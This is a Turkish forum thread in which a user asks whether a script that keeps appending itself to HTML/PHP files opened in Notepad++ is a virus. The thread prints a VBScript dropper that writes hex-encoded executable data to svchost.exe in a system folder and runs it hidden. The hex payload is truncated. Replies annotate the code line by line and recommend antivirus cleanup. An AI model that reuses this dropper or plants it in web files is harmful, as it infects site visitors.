Notepad++ Da Bu Virusmudur?
-
enteresan vırusumsu bı kod var bu notepad++ da pc yenı formatlı olmasına ragmen bıyerleden geldı az once buraya gorun dıye ekleyecektım amma chromu kılıtledı nasıl bı belaysa. belırlı bı kısmını buraya atayım bı bakın nasıl temızlerız.
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A9000(buranın daha devamı var bol rakamlıca)
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
-
yazdırdığı dataya bağlı, fakat şüpheli duruyor
-
bu bela nasıl bişeyse nerden geliosa anlamadım. notepad de bi html php vs dosyası actıgımda hemen en alta script olarak yazdırıyor kendisini farketmezde o dosyayı hosta atarsam chrome bunu vırus olarak fegerlendırıp sıteyı engellıyor zaten ordaki svchost.exe yı calıstırması bı enteresan.
-
Avast konuya girmeme bile izin vermedi. Virüstotal'e yükleyip bi sonuç atar mısın ?
-
http://stackoverflow.com/a/29484737
Görünüşe göre bir virüs evet.
Üstteki arkadaş ruby yükleyip bir dosyaya vb kodlarının temizliği için hangi kodları çalıştıracağını yazmış. Bir dene istersen.
-
DropFileName = "svchost.exe" 'olusturulucak dosya ismi
WriteData = "4D5A9000(buranın daha devamı var bol rakamlıca) 'Exe HeX Kodlari
Set FSO = CreateObject("Scripting.FileSystemObject") Dosya islemleri nesne olusturuyor
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName 'windowus dizii yada apdata dizinini aliyor
If FSO.FileExists(DropPath)=False Then '
Set FileObj = FSO.CreateTextFile(DropPath, True) 'txt dosyasi olustur
or i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) 'dongu kullanarak hex txt dosyasina yazdir
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0 ' yazdirdigi dosyayi calistiyor
virustur direk combofix veya antiyle tarattir